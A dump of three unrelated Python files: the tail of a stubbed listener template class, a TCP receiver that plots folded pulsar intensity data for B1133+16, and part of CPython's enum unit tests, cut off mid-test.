kick off logic here and the actual server code in another function to facilitate threading (i.e. start_server() in the http listener). """ # listenerOptions = self.options # if name and name != '': # self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) # self.threads[name].start() # time.sleep(1) # # returns True if the listener successfully started, false otherwise # return self.threads[name].is_alive() # else: # name = listenerOptions['Name']['Value'] # self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) # self.threads[name].start() # time.sleep(1) # # returns True if the listener successfully started, false otherwise # return self.threads[name].is_alive() return True def shutdown(self, name=''): """ If a server component was started, implement the logic that kills the particular named listener here. """ # if name and name != '': # print helpers.color("[!] Killing listener '%s'" % (name)) # self.threads[name].kill() # else: # print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])) # self.threads[self.options['Name']['Value']].kill() pass
kvPeekTCP_reconn.py
# === Start Python 2/3 compatibility from __future__ import absolute_import, division, print_function, unicode_literals from future.builtins import * # noqa pylint: disable=W0401, W0614 from future.builtins.disabled import * # noqa pylint: disable=W0401, W0614 # === End Python 2/3 compatibility from future import standard_library standard_library.install_aliases() import time import threading import socket import sys import numpy as np import matplotlib.pyplot as plt import matplotlib.animation as animation import matplotlib.dates as md import datetime import struct import json np.seterr(divide="ignore", invalid="ignore") # target = 'B2111+46' # target = 'B0329+54' target = "B1133+16" # struct IntensityHeader { # int packet_length; // - packet length # int header_length; // - header length # int samples_per_packet; // - number of samples in packet (or dimensions, n_freq x n_time x n_stream?) # int sample_type; // - data type of samples in packet # double raw_cadence; // - raw sample cadence # int num_freqs; // - freq list / map # int samples_summed; // - samples summed for each datum # uint handshake_idx; // - frame idx at handshake # double handshake_utc; // - UTC time at handshake # char stokes_type; // - description of stream (e.g. V / H pol, Stokes-I / Q / U / V) # // -8 -7 -6 -5 -4 -3 -2 -1 1 2 3 4 # // YX XY YY XX LR RL LL RR I Q U V # }; header_fmt = "=iiiidiiiId" stokes_lookup = ["YX", "XY", "YY", "XX", "LR", "RL", "LL", "RR", "I", "Q", "U", "V"] TCP_IP = "0.0.0.0" TCP_PORT = 2054 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((TCP_IP, TCP_PORT)) sock.listen(1) psrcat = json.load(open("psrcat/psrcat_b.json"))["pulsars"] psrdata = psrcat[target] def updatefig(*args): global waterfall, times, medsub, colorscale tmin = md.date2num(datetime.datetime.fromtimestamp(np.amin(times))) tmax = md.date2num(datetime.datetime.fromtimestamp(np.amax(times))) for i in np.arange(pkt_elems): if medsub: p[i].set_data( waterfall[:, :, i] - np.nanmedian(waterfall[:, :, i], axis=0)[np.newaxis, :] ) tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i]) p[pkt_elems + i].set_data( tmpdata - np.median(tmpdata, axis=0)[np.newaxis, :] ) else: p[i].set_data(waterfall[:, :, i]) tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i]) p[pkt_elems + i].set_data(tmpdata) p[i].set_extent([freqlist[0, 0], freqlist[-1, -1], tmin, tmax]) p[i].set_clim(vmin=colorscale[0], vmax=colorscale[1]) p[pkt_elems + i].set_clim(vmin=colorscale[0] / 10, vmax=colorscale[1] / 10) return (p,) def receive(connection, length): chunks = [] bytes_recd = 0 while bytes_recd < length: chunk = connection.recv(min(length - bytes_recd, 2048)) if chunk == b"": raise RuntimeError("socket connection broken") chunks.append(chunk) bytes_recd = bytes_recd + len(chunk) return b"".join(chunks) connection, client_address = sock.accept() packed_header = receive(connection, 48) print(len(packed_header), packed_header) tcp_header = struct.unpack(header_fmt, packed_header) pkt_length = tcp_header[0] # packet_length pkt_header = tcp_header[1] # header_length pkt_samples = tcp_header[2] # samples_per_packet pkt_dtype = tcp_header[3] # sample_type pkt_raw_cad = tcp_header[4] # raw_cadence pkt_freqs = tcp_header[5] # num_freqs pkt_elems = tcp_header[6] # num_freqs pkt_int_len = tcp_header[7] # samples_summed pkt_idx0 = tcp_header[8] # handshake_idx pkt_utc0 = tcp_header[9] # handshake_utc print(tcp_header) sec_per_pkt_frame = pkt_raw_cad * pkt_int_len info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1) freqlist = np.fromstring(info_header[: pkt_freqs * 4 * 2], dtype=np.float32).reshape( -1, 2 ) # .mean(axis=1) freqlist = freqlist / 1e6 elemlist = np.fromstring(info_header[pkt_freqs * 4 * 2 :], dtype=np.int8) plot_freqs = pkt_freqs // 8 # freqlist = freqlist.reshape(-1,plot_freqs).mean(axis=1) plot_times = 256 plot_phase = 128 total_integration = 1024 * 8 if pkt_int_len > total_integration: print("Pre-integrated to longer than desired time!") print("{} vs {}".format(pkt_int_len, total_integration)) print("Resetting integration length to {}".format(pkt_int_len)) total_integration = pkt_int_len local_integration = total_integration // pkt_int_len waterfall = np.zeros((plot_times, plot_freqs, pkt_elems), dtype=np.float32) + np.nan countfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32) fold_period = 1.0 / psrdata["frequency"] waterfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32) times = np.zeros(plot_times) def data_listener(): global connection, sock global waterfall, waterfold, countfold global times, total_integration, pkt_idx0 last_idx = pkt_idx0 data_pkt_frame_idx = 0 data_pkt_samples_summed = 1 idx = 0 while True: try: d = np.zeros([pkt_freqs, pkt_elems]) n = np.zeros([pkt_freqs, pkt_elems]) t = np.zeros(plot_times) waterfold *= 0.999 countfold *= 0.999 for i in np.arange(local_integration * pkt_elems): data = receive(connection, pkt_length + pkt_header) if len(data) != pkt_length + pkt_header: print("Lost Connection!") connection.close() return data_pkt_frame_idx, data_pkt_elem_idx, data_pkt_samples_summed = struct.unpack( "III", data[:pkt_header] ) d[:, data_pkt_elem_idx] += ( np.fromstring(data[pkt_header:], dtype=np.uint32) * 1.0 ) n[:, data_pkt_elem_idx] += data_pkt_samples_summed * 1.0 fold_idx = np.array( ( (sec_per_pkt_frame * data_pkt_frame_idx + 0.5 * fold_period) % fold_period ) / fold_period * plot_phase, dtype=np.int32, ) waterfold[fold_idx, :, data_pkt_elem_idx] += ( np.fromstring(data[pkt_header:], dtype=np.uint32) .reshape(-1, pkt_freqs // plot_freqs) .mean(axis=1) ) countfold[fold_idx, :, data_pkt_elem_idx] += data_pkt_samples_summed roll_idx = (data_pkt_frame_idx - last_idx) // local_integration times = np.roll(times, roll_idx) times[0] = sec_per_pkt_frame * (data_pkt_frame_idx - pkt_idx0) + pkt_utc0 # print(d,n) waterfall = np.roll(waterfall, roll_idx, axis=0) waterfall[0, :, :] = 10 * np.log10( (d / n).reshape(-1, pkt_freqs // plot_freqs, pkt_elems).mean(axis=1) ) if np.mean(n) != total_integration: print(np.mean(n), np.std(n)) last_idx = data_pkt_frame_idx # except socket.error, exc: except: connection, client_address = sock.accept() packed_header = receive(connection, 48) info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1) print("Reconnected!") thread = threading.Thread(target=data_listener) thread.daemon = True thread.start() time.sleep(1) f, ax = plt.subplots(2, pkt_elems, gridspec_kw={"height_ratios": [2, 1]}) f.subplots_adjust(right=0.8) if pkt_elems == 1: ax = [ax] plt.ioff() p = [] tmin = md.date2num( datetime.datetime.fromtimestamp( pkt_utc0 - plot_times * local_integration * sec_per_pkt_frame ) ) tmax = md.date2num(datetime.datetime.fromtimestamp(pkt_utc0)) times = pkt_utc0 - np.arange(plot_times) * local_integration * sec_per_pkt_frame date_format = md.DateFormatter("%H:%M:%S") medsub = True colorscale = [-0.5, 0.5] for i in np.arange(pkt_elems): p.append( ax[0, i].imshow( waterfall[:, :, i], aspect="auto", animated=True, origin="upper", interpolation="nearest", cmap="gray", vmin=colorscale[0], vmax=colorscale[1], extent=[freqlist[0, 0], freqlist[-1, -1], tmin, tmax], ) ) ax[0, i].set_yticklabels([]) ax[0, i].yaxis_date() ax[0, 0].set_title(stokes_lookup[elemlist[0] + 8]) ax[0, 1].set_title(stokes_lookup[elemlist[1] + 8]) ax[0, 0].set_ylabel("Local Time") ax[0, 0].yaxis_date() ax[0, 0].yaxis.set_major_formatter(date_format) for i in np.arange(pkt_elems): p.append( ax[1, i].imshow( waterfold[:, :, i], aspect="auto", animated=True, origin="upper", interpolation="nearest", cmap="gray", vmin=colorscale[0], vmax=colorscale[1], extent=[freqlist[0, 0], freqlist[-1, -1], 0, 1], ) ) ax[1, i].set_xlabel("Freq (MHz)") ax[1, 0].set_ylabel("Pulse Phase") cbar_ax = f.add_axes([0.85, 0.15, 0.05, 0.7]) c = f.colorbar(p[0], cax=cbar_ax) c.set_label("Power (dB, arbitrary)") from matplotlib.widgets import Slider, Button rax = plt.axes([0.82, 0.03, 0.15, 0.04]) check = Button(rax, "Med Subtract") def func(event): global medsub, check, colorscale medsub = not medsub if medsub: check.label.set_text("Med Subtracted") colorscale = [-0.5, 0.5] else: check.label.set_text("Raw Power") colorscale = [-10, 10] check.on_clicked(func) ani = animation.FuncAnimation(f, updatefig, frames=100, interval=100) f.show()
test_enum.py
import enum import inspect import pydoc import unittest from collections import OrderedDict from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto from io import StringIO from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL from test import support try: import threading except ImportError: threading = None try: class Stooges(Enum): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: Stooges = exc try: class IntStooges(int, Enum): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: IntStooges = exc try: class FloatStooges(float, Enum): LARRY = 1.39 CURLY = 2.72 MOE = 3.142596 except Exception as exc: FloatStooges = exc try: class FlagStooges(Flag): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: FlagStooges = exc try: class StrEnum(str, Enum): """accepts only string values""" class Name(StrEnum): BDFL = 'Guido van Rossum' FLUFL = 'Barry Warsaw' except Exception as exc: Name = exc try: Question = Enum('Question', 'who what when where why', module=__name__) except Exception as exc: Question = exc try: Answer = Enum('Answer', 'him this then there because') except Exception as exc: Answer = exc try: Theory = Enum('Theory', 'rule law supposition', qualname= 'spanish_inquisition') except Exception as exc: Theory = exc try: class Fruit(Enum): TOMATO = 1 BANANA = 2 CHERRY = 3 except Exception: pass def test_pickle_dump_load(assertion, source, target=None): if target is None: target = source for protocol in range(HIGHEST_PROTOCOL + 1): assertion(loads(dumps(source, protocol=protocol)), target) def test_pickle_exception(assertion, exception, obj): for protocol in range(HIGHEST_PROTOCOL + 1): with assertion(exception): dumps(obj, protocol=protocol) class TestHelpers(unittest.TestCase): def test_is_descriptor(self): class foo: pass for attr in ('__get__', '__set__', '__delete__'): obj = foo() self.assertFalse(enum._is_descriptor(obj)) setattr(obj, attr, 1) self.assertTrue(enum._is_descriptor(obj)) def test_is_sunder(self): for s in ('_a_', '_aa_'): self.assertTrue(enum._is_sunder(s)) for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_', '__', '___', '____', '_____'): self.assertFalse(enum._is_sunder(s)) def test_is_dunder(self): for s in ('__a__', '__aa__'): self.assertTrue(enum._is_dunder(s)) for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_', '__', '___', '____', '_____'): self.assertFalse(enum._is_dunder(s)) class TestEnum(unittest.TestCase): def setUp(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = 3 WINTER = 4 self.Season = Season class Konstants(float, Enum): E = 2.7182818 PI = 3.1415926 TAU = 2 * PI self.Konstants = Konstants class Grades(IntEnum): A = 5 B = 4 C = 3 D = 2 F = 0 self.Grades = Grades class Directional(str, Enum): EAST = 'east' WEST = 'west' NORTH = 'north' SOUTH = 'south' self.Directional = Directional from datetime import date class Holiday(date, Enum): NEW_YEAR = 2013, 1, 1 IDES_OF_MARCH = 2013, 3, 15 self.Holiday = Holiday def test_dir_on_class(self): Season = self.Season self.assertEqual(set(dir(Season)), set(['__class__', '__doc__', '__members__', '__module__', 'SPRING', 'SUMMER', 'AUTUMN', 'WINTER'])) def test_dir_on_item(self): Season = self.Season self.assertEqual(set(dir(Season.WINTER)), set(['__class__', '__doc__', '__module__', 'name', 'value'])) def test_dir_with_added_behavior(self): class Test(Enum): this = 'that' these = 'those' def wowser(self): return "Wowser! I'm %s!" % self.name self.assertEqual(set(dir(Test)), set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these'])) self.assertEqual(set(dir(Test.this)), set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser'])) def test_dir_on_sub_with_behavior_on_super(self): class SuperEnum(Enum): def invisible(self): return 'did you see me?' class SubEnum(SuperEnum): sample = 5 self.assertEqual(set(dir(SubEnum.sample)), set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible'])) def test_enum_in_enum_out(self): Season = self.Season self.assertIs(Season(Season.WINTER), Season.WINTER) def test_enum_value(self): Season = self.Season self.assertEqual(Season.SPRING.value, 1) def test_intenum_value(self): self.assertEqual(IntStooges.CURLY.value, 2) def test_enum(self): Season = self.Season lst = list(Season) self.assertEqual(len(lst), len(Season)) self.assertEqual(len(Season), 4, Season) self.assertEqual([Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst) for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1): e = Season(i) self.assertEqual(e, getattr(Season, season)) self.assertEqual(e.value, i) self.assertNotEqual(e, i) self.assertEqual(e.name, season) self.assertIn(e, Season) self.assertIs(type(e), Season) self.assertIsInstance(e, Season) self.assertEqual(str(e), 'Season.' + season) self.assertEqual(repr(e), '<Season.{0}: {1}>'.format(season, i)) def test_value_name(self): Season = self.Season self.assertEqual(Season.SPRING.name, 'SPRING') self.assertEqual(Season.SPRING.value, 1) with self.assertRaises(AttributeError): Season.SPRING.name = 'invierno' with self.assertRaises(AttributeError): Season.SPRING.value = 2 def test_changing_member(self): Season = self.Season with self.assertRaises(AttributeError): Season.WINTER = 'really cold' def test_attribute_deletion(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = 3 WINTER = 4 def spam(cls): pass self.assertTrue(hasattr(Season, 'spam')) del Season.spam self.assertFalse(hasattr(Season, 'spam')) with self.assertRaises(AttributeError): del Season.SPRING with self.assertRaises(AttributeError): del Season.DRY with self.assertRaises(AttributeError): del Season.SPRING.name def test_bool_of_class(self): class Empty(Enum): pass self.assertTrue(bool(Empty)) def test_bool_of_member(self): class Count(Enum): zero = 0 one = 1 two = 2 for member in Count: self.assertTrue(bool(member)) def test_invalid_names(self): with self.assertRaises(ValueError): class Wrong(Enum): mro = 9 with self.assertRaises(ValueError): class Wrong(Enum): _create_ = 11 with self.assertRaises(ValueError): class Wrong(Enum): _get_mixins_ = 9 with self.assertRaises(ValueError): class Wrong(Enum): _find_new_ = 1 with self.assertRaises(ValueError): class Wrong(Enum): _any_name_ = 9 def test_bool(self): class Logic(Enum): true = True false = False self.assertTrue(Logic.true) self.assertTrue(Logic.false) class RealLogic(Enum): true = True false = False def __bool__(self): return bool(self._value_) self.assertTrue(RealLogic.true) self.assertFalse(RealLogic.false) class IntLogic(int, Enum): true = 1 false = 0 self.assertTrue(IntLogic.true) self.assertFalse(IntLogic.false) def test_contains(self): Season = self.Season self.assertIn(Season.AUTUMN, Season) self.assertNotIn(3, Season) val = Season(3) self.assertIn(val, Season) class OtherEnum(Enum): one = 1 two = 2 self.assertNotIn(OtherEnum.two, Season) def test_comparisons(self): Season = self.Season with self.assertRaises(TypeError): Season.SPRING < Season.WINTER with self.assertRaises(TypeError): Season.SPRING > 4 self.assertNotEqual(Season.SPRING, 1) class Part(Enum): SPRING = 1 CLIP = 2 BARREL = 3 self.assertNotEqual(Season.SPRING, Part.SPRING) with self.assertRaises(TypeError): Season.SPRING < Part.CLIP def test_enum_duplicates(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = FALL = 3 WINTER = 4 ANOTHER_SPRING = 1 lst = list(Season) self.assertEqual(lst, [Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER]) self.assertIs(Season.FALL, Season.AUTUMN) self.assertEqual(Season.FALL.value, 3) self.assertEqual(Season.AUTUMN.value, 3) self.assertIs(Season(3), Season.AUTUMN) self.assertIs(Season(1), Season.SPRING) self.assertEqual(Season.FALL.name, 'AUTUMN') self.assertEqual([k for k, v in Season.__members__.items() if v. name != k], ['FALL', 'ANOTHER_SPRING']) def test_duplicate_name(self): with self.assertRaises(TypeError): class Color(Enum): red = 1 green = 2 blue = 3 red = 4 with self.assertRaises(TypeError): class Color(Enum): red = 1 green = 2 blue = 3 def red(self): return 'red' with self.assertRaises(TypeError): class Color(Enum): @property def red(self): return 'redder' red = 1 green = 2 blue = 3 def test_enum_with_value_name(self): class Huh(Enum): name = 1 value = 2 self.assertEqual(list(Huh), [Huh.name, Huh.value]) self.assertIs(type(Huh.name), Huh) self.assertEqual(Huh.name.name, 'name') self.assertEqual(Huh.name.value, 1) def test_format_enum(self): Season = self.Season self.assertEqual('{}'.format(Season.SPRING), '{}'.format(str(Season .SPRING))) self.assertEqual('{:}'.format(Season.SPRING), '{:}'.format(str( Season.SPRING))) self.assertEqual('{:20}'.format(Season.SPRING), '{:20}'.format(str( Season.SPRING))) self.assertEqual('{:^20}'.format(Season.SPRING), '{:^20}'.format( str(Season.SPRING))) self.assertEqual('{:>20}'.format(Season.SPRING), '{:>20}'.format( str(Season.SPRING))) self.assertEqual('{:<20}'.format(Season.SPRING), '{:<20}'.format( str(Season.SPRING))) def test_format_enum_custom(self): class TestFloat(float, Enum): one = 1.0 two = 2.0 def __format__(self, spec): return 'TestFloat success!' self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!') def assertFormatIsValue(self, spec, member): self.assertEqual(spec.format(member), spec.format(member.value)) def test_format_enum_date(self): Holiday = self.Holiday self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH) def test_format_enum_float(self): Konstants = self.Konstants self.assertFormatIsValue('{}', Konstants.TAU) self.assertFormatIsValue('{:}', Konstants.TAU) self.assertFormatIsValue('{:20}', Konstants.TAU) self.assertFormatIsValue('{:^20}', Konstants.TAU) self.assertFormatIsValue('{:>20}', Konstants.TAU) self.assertFormatIsValue('{:<20}', Konstants.TAU) self.assertFormatIsValue('{:n}', Konstants.TAU) self.assertFormatIsValue('{:5.2}', Konstants.TAU) self.assertFormatIsValue('{:f}', Konstants.TAU) def test_format_enum_int(self): Grades = self.Grades self.assertFormatIsValue('{}', Grades.C) self.assertFormatIsValue('{:}', Grades.C) self.assertFormatIsValue('{:20}', Grades.C) self.assertFormatIsValue('{:^20}', Grades.C) self.assertFormatIsValue('{:>20}', Grades.C) self.assertFormatIsValue('{:<20}', Grades.C) self.assertFormatIsValue('{:+}', Grades.C) self.assertFormatIsValue('{:08X}', Grades.C) self.assertFormatIsValue('{:b}', Grades.C) def test_format_enum_str(self): Directional = self.Directional self.assertFormatIsValue('{}', Directional.WEST) self.assertFormatIsValue('{:}', Directional.WEST) self.assertFormatIsValue('{:20}', Directional.WEST) self.assertFormatIsValue('{:^20}', Directional.WEST) self.assertFormatIsValue('{:>20}', Directional.WEST) self.assertFormatIsValue('{:<20}', Directional.WEST) def test_hash(self): Season = self.Season dates = {} dates[Season.WINTER] = '1225' dates[Season.SPRING] = '0315' dates[Season.SUMMER] = '0704' dates[Season.AUTUMN] = '1031' self.assertEqual(dates[Season.AUTUMN], '1031') def test_intenum_from_scratch(self): class phy(int, Enum): pi = 3 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_intenum_inherited(self): class IntEnum(int, Enum): pass class phy(IntEnum): pi = 3 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_floatenum_from_scratch(self): class phy(float, Enum): pi = 3.1415926 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_floatenum_inherited(self): class FloatEnum(float, Enum): pass class phy(FloatEnum): pi = 3.1415926 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_strenum_from_scratch(self): class phy(str, Enum): pi = 'Pi' tau = 'Tau' self.assertTrue(phy.pi < phy.tau) def test_strenum_inherited(self): class StrEnum(str, Enum): pass class phy(StrEnum): pi = 'Pi' tau = 'Tau' self.assertTrue(phy.pi < phy.tau) def test_intenum(self): class WeekDay(IntEnum): SUNDAY = 1 MONDAY = 2 TUESDAY = 3 WEDNESDAY = 4 THURSDAY = 5 FRIDAY = 6 SATURDAY = 7 self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c') self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2]) lst = list(WeekDay) self.assertEqual(len(lst), len(WeekDay)) self.assertEqual(len(WeekDay), 7) target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY' target = target.split() for i, weekday in enumerate(target, 1): e = WeekDay(i) self.assertEqual(e, i) self.assertEqual(int(e), i) self.assertEqual(e.name, weekday) self.assertIn(e, WeekDay) self.assertEqual(lst.index(e) + 1, i) self.assertTrue(0 < e < 8) self.assertIs(type(e), WeekDay) self.assertIsInstance(e, int) self.assertIsInstance(e, Enum) def test_intenum_duplicates(self): class WeekDay(IntEnum): SUNDAY = 1 MONDAY = 2 TUESDAY = TEUSDAY = 3 WEDNESDAY = 4 THURSDAY = 5 FRIDAY = 6 SATURDAY = 7 self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY) self.assertEqual(WeekDay(3).name, 'TUESDAY') self.assertEqual([k for k, v in WeekDay.__members__.items() if v. name != k], ['TEUSDAY']) def test_intenum_from_bytes(self): self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE ) with self.assertRaises(ValueError): IntStooges.from_bytes(b'\x00\x05', 'big') def test_floatenum_fromhex(self): h = float.hex(FloatStooges.MOE.value) self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE) h = float.hex(FloatStooges.MOE.value + 0.01) with self.assertRaises(ValueError): FloatStooges.fromhex(h) def test_pickle_enum(self): if isinstance(Stooges, Exception): raise Stooges test_pickle_dump_load(self.assertIs, Stooges.CURLY) test_pickle_dump_load(self.assertIs, Stooges) def test_pickle_int(self): if isinstance(IntStooges, Exception): raise IntStooges test_pickle_dump_load(self.assertIs, IntStooges.CURLY) test_pickle_dump_load(self.assertIs, IntStooges) def test_pickle_float(self): if isinstance(FloatStooges, Exception): raise FloatStooges test_pickle_dump_load(self.assertIs, FloatStooges.CURLY) test_pickle_dump_load(self.assertIs, FloatStooges) def test_pickle_enum_function(self): if isinstance(Answer, Exception): raise Answer test_pickle_dump_load(self.assertIs, Answer.him) test_pickle_dump_load(self.assertIs, Answer) def test_pickle_enum_function_with_module(self): if isinstance(Question, Exception): raise Question test_pickle_dump_load(self.assertIs, Question.who) test_pickle_dump_load(self.assertIs, Question) def test_enum_function_with_qualname(self): if isinstance(Theory, Exception): raise Theory self.assertEqual(Theory.__qualname__, 'spanish_inquisition') def test_class_nested_enum_and_pickle_protocol_four(self): class NestedEnum(Enum): twigs = 'common' shiny = 'rare' self.__class__.NestedEnum = NestedEnum self.NestedEnum.__qualname__ = ('%s.NestedEnum' % self.__class__. __name__) test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs) def test_pickle_by_name(self): class ReplaceGlobalInt(IntEnum): ONE = 1 TWO = 2 ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name for proto in range(HIGHEST_PROTOCOL): self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO') def test_exploding_pickle(self): BadPickle = Enum('BadPickle', 'dill sweet bread-n-butter', module= __name__) globals()['BadPickle'] = BadPickle enum._make_class_unpicklable(BadPickle) test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill) test_pickle_exception(self.assertRaises, PicklingError, BadPickle) def test_string_enum(self): class SkillLevel(str, Enum): master = 'what is the sound of one hand clapping?' journeyman = 'why did the chicken cross the road?' apprentice = 'knock, knock!' self.assertEqual(SkillLevel.apprentice, 'knock, knock!') def test_getattr_getitem(self): class Period(Enum): morning = 1 noon = 2 evening = 3 night = 4 self.assertIs(Period(2), Period.noon) self.assertIs(getattr(Period, 'night'), Period.night) self.assertIs(Period['morning'], Period.morning) def test_getattr_dunder(self): Season = self.Season self.assertTrue(getattr(Season, '__eq__')) def test_iteration_order(self): class Season(Enum): SUMMER = 2 WINTER = 4 AUTUMN = 3 SPRING = 1 self.assertEqual(list(Season), [Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING]) def test_reversed_iteration_order(self): self.assertEqual(list(reversed(self.Season)), [self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER, self.Season.SPRING]) def test_programmatic_function_string(self): SummerMonth = Enum('SummerMonth', 'june july august') lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_with_start(self): SummerMonth = Enum('SummerMonth', 'june july august', start=10) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 10): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_list(self): SummerMonth = Enum('SummerMonth', ['june', 'july', 'august']) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_list_with_start(self): SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 20): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_iterable(self): SummerMonth = Enum('SummerMonth', (('june', 1), ('july', 2), ( 'august', 3))) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_from_dict(self): SummerMonth = Enum('SummerMonth', OrderedDict((('june', 1), ('july', 2), ('august', 3)))) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type(self): SummerMonth = Enum('SummerMonth', 'june july august', type=int) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_with_start(self): SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 30): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_from_subclass(self): SummerMonth = IntEnum('SummerMonth', 'june july august') lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_from_subclass_with_start(self): SummerMonth = IntEnum('SummerMonth', 'june july august', start=40) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) 